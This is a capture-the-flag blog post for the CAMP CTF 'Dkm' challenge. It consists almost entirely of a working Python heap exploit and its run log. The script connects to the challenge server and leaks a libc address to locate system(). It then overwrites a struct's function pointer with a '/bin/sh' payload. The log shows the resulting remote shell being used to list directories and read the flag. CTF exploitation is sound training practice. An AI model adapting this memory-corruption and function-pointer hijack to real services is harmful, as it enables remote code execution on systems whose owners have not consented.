staring into /dev/null

barrebas

CAMP CTF - Dkm

Writeup coming soon! For now, here’s the exploit.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115

#!/usr/bin/python
import struct, time
from socket import *

def q(x):
  return struct.pack("<Q", x)

def readtil(delim):
  buf = b''
  while not delim in buf:
      buf += s.recv(1)
  return buf

def add_dkm_without_wifi(comment=""):
  s.send('2\n')
  s.send('2\n')
  s.send('\n')
  s.send('\n')
  s.send(comment+'\n')

def add_dkm_with_wifi(comment):
  s.send('2\n')
  s.send('1\n')
  s.send('\n')
  s.send('\n')
  s.send('\n')
  s.send(comment+'\n')

def edit_dkm_without_wifi(id,comment):
  s.send('4\n')
  s.send(str(id)+'\n')
  s.send('2\n')
  s.send('1\n')
  s.send('1\n')
  s.send(comment+'\n')
  #s.send('\n')

def edit_dkm_with_wifi(id,ssid):
  s.send('4\n')
  s.send(str(id)+'\n')
  s.send('1\n')
  s.send('\n')
  s.send('\n')
  s.send('\n')
  #s.send(ssid+'\n')
  s.send('\n')
  
def delete_dkm(id):
  s.send('3\n')
  s.send(str(id)+'\n')

def pwn():
  global s
  s = socket(AF_INET, SOCK_STREAM)
  s.connect(('challs.campctf.ccc.ac', 10102))
  #s.connect(('localhost', 4444))

  raw_input('dbg')

  readtil('Exit')
  add_dkm_with_wifi('')
  print readtil('Exit')
  print 'adding second wifi'
  add_dkm_with_wifi('')
  print readtil('Exit')
  
  edit_dkm_without_wifi(0, q(0x602040))

  s.send('1\n')
  readtil('SSID: ')
  data= s.recv(6)

  data += "\x00\x00"
  strtoull = (struct.unpack('<Q', data)[0])
  libc = strtoull - 0x000000000003b1a0

  print 'libc: %x' % libc
  system = libc + 0x443d0
  print 'system: %x' % system

  print readtil('Exit')
  print 'deleting second wifi'
  delete_dkm(1)
  print readtil('Exit')
  print 'shrinking first wifi'
  edit_dkm_without_wifi(0,'') # resize it
  print readtil('Exit')
  print 'adding second nowifi'
  add_dkm_without_wifi() # allocate new struct next to old dk
  print readtil('Exit')
  
  # edit first struct (now resized) as large struct, so the comment goes into the next chunk's function pointers
  s.send('4\n')
  s.send('0\n')
  s.send('3\n')
  s.send('1\n')
  s.send('1\n')
  s.send('1\n')
  s.send('1\n')
  #payload = "".join(["%04d" % x for x in range(1023/4)])
  # ugly padding
  payload = "AAAA"+"/bin/sh; #"*80+"AAAA"+q(system)
  s.send(payload+'\n')

  # execute struct->edit_with_wifi (overwritten with system)
  s.send('4\n')
  s.send('1\n')
  s.send('3\n')  # code exec much?

  import telnetlib
  t = telnetlib.Telnet()
  t.sock = s
  t.interact()
  s.close()
pwn()

And against the remote binary:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154

ubuntu@ubuntu-VirtualBox:~$ python poc.py
dbg

> Does the DK have wifi?
1) Yes
2) No
> Please enter longitude * 10000:
> Please enter latitude * 10000:
> Please enter the number of ssids, this DK supports.
> Please enter a comment for this DK.
> DK #0 successfully added.
Menu:
1) List DK's
2) Add a DK
3) Remove a DK
4) Edit a DK
5) Exit
adding second wifi

> Does the DK have wifi?
1) Yes
2) No
> Please enter longitude * 10000:
> Please enter latitude * 10000:
> Please enter the number of ssids, this DK supports.
> Please enter a comment for this DK.
> DK #1 successfully added.
Menu:
1) List DK's
2) Add a DK
3) Remove a DK
4) Edit a DK
5) Exit
libc: 7f912685f000
system: 7f91268a33d0

 Comment:

DK #1 with wifi @ 0.0000/0.0000:
 Comment:


Menu:
1) List DK's
2) Add a DK
3) Remove a DK
4) Edit a DK
5) Exit
deleting second wifi

> Enter DK index: 
> DK #1 successfully deleted.
Menu:
1) List DK's
2) Add a DK
3) Remove a DK
4) Edit a DK
5) Exit
shrinking first wifi

> Enter DK index:
> Editing DK #0:
Does the DK have wifi?
1) Yes
2) No
3) Do not change
> Please enter longitude * 10000:
> Please enter latitude * 10000:
> Please enter a comment for this DK.
> DK #0 successfully saved.
Menu:
1) List DK's
2) Add a DK
3) Remove a DK
4) Edit a DK
5) Exit
adding second nowifi

> Does the DK have wifi?
1) Yes
2) No
> Please enter longitude * 10000:
> Please enter latitude * 10000:
> Please enter a comment for this DK.
> DK #1 successfully added.
Menu:
1) List DK's
2) Add a DK
3) Remove a DK
4) Edit a DK
5) Exit

> Enter DK index:
> Editing DK #0:
Does the DK have wifi?
1) Yes
2) No
3) Do not change
> Please enter longitude * 10000:
> Please enter latitude * 10000:
> Please enter the number of ssids, this DK supports.
> Please enter the name of SSID #0.
> Please enter a comment for this DK.
> DK #0 successfully saved.
Menu:
1) List DK's
2) Add a DK
3) Remove a DK
4) Edit a DK
5) Exit
> Enter DK index:
> Editing DK #1:
Does the DK have wifi?
1) Yes
2) No
3) Do not change
> id
uid=1001(challenge) gid=1001(challenge) groups=1001(challenge)
cat flag.txt
cat: flag.txt: No such file or directory
ls
bin
boot
dev
etc
home
initrd.img
initrd.img.old
lib
lib64
lost+found
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var
vmlinuz
vmlinuz.old
cd home
ls
challenge
cd cha*
ls
challenge
flag.txt
cat flag.txt
CAMP15_aecbde52de8b1ed16bf62aa772d53a2

Comments